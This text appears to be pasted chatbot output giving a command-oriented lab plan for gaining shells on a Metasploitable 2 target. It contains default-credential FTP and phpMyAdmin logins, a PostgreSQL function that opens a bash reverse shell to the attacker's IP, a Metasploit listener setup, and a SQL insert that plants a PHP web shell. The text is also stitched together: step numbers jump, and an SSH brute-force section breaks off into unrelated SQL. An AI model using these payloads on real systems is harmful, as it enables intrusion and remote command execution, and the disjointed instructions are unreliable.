Here’s a detailed command-oriented lab plan focusing exclusively on shell exploitation via two methods:
User Involvement (e.g., phishing, weak credentials).
No User Involvement (exploiting services and backdoors).
Lab Objective:
Gain shells on the Metasploitable 2 system through interactive and non-interactive methods.
1. Environment Setup
Ensure both Kali Linux (attacker) and Metasploitable 2 (target) are on the same network. Use their IP addresses for exploitation.
ping [Metasploitable 2 IP]
2. Gaining Shell Access via User Interaction
Step 1: Exploiting FTP with Weak Credentials
Manual Connection:
ftp [Metasploitable 2 IP]
# Login using default credentials (e.g., msfadmin:msfadmin)
Download Payload via FTP:
ftp [Metasploitable 2 IP]
put reverse_shell.sh
Execute Payload:
bash reverse_shell.sh
Brute-forcing SSH passwords using a wordlist can be done with tools such as Hydra, Medusa, or Nmap scripts. Here’s how you can accomplish this, assuming you have permission for such activities as part of a penetration testing scenario.
1. Using Hydra
Hydra is a powerful tool for brute-forcing various protocols, including SSH.
CREATE OR REPLACE FUNCTION runcmd() RETURNS void AS $$
DECLARE
result TEXT;
BEGIN
result := system('bash -i >& /dev/tcp/[Your IP]/5555 0>&1');
END;
$$ LANGUAGE plpgsql;
SELECT runcmd();
Step 7: Multi-Handler Shell Listener
Setup Multi-Handler:
msfconsole
use exploit/multi/handler
set PAYLOAD linux/x86/meterpreter/reverse_tcp
set LHOST [Your IP]
set LPORT 5555
run
These methods focus on gaining shells interactively (via weak credentials) and non-interactively (via exploits and backdoors). Would you like further customization for specific services or payloads?
Here’s an extended list with additional methods for shell exploitation using both user involvement and no user involvement techniques on Metasploitable 2. The aim is to include diverse services, exploits, and creative ways to gain a shell.
1. User Involvement Exploitation
Exploiting Weak Web Credentials
Upload Reverse Shell via PHPMyAdmin
Log in to http://[Metasploitable 2 IP]/phpmyadmin with default credentials (root:root).
Execute the following SQL command to write a PHP reverse shell:
CREATE TABLE cmd_shell (cmd BLOB);
INSERT INTO cmd_shell VALUES ('<?php system($_GET["cmd"]); ?>');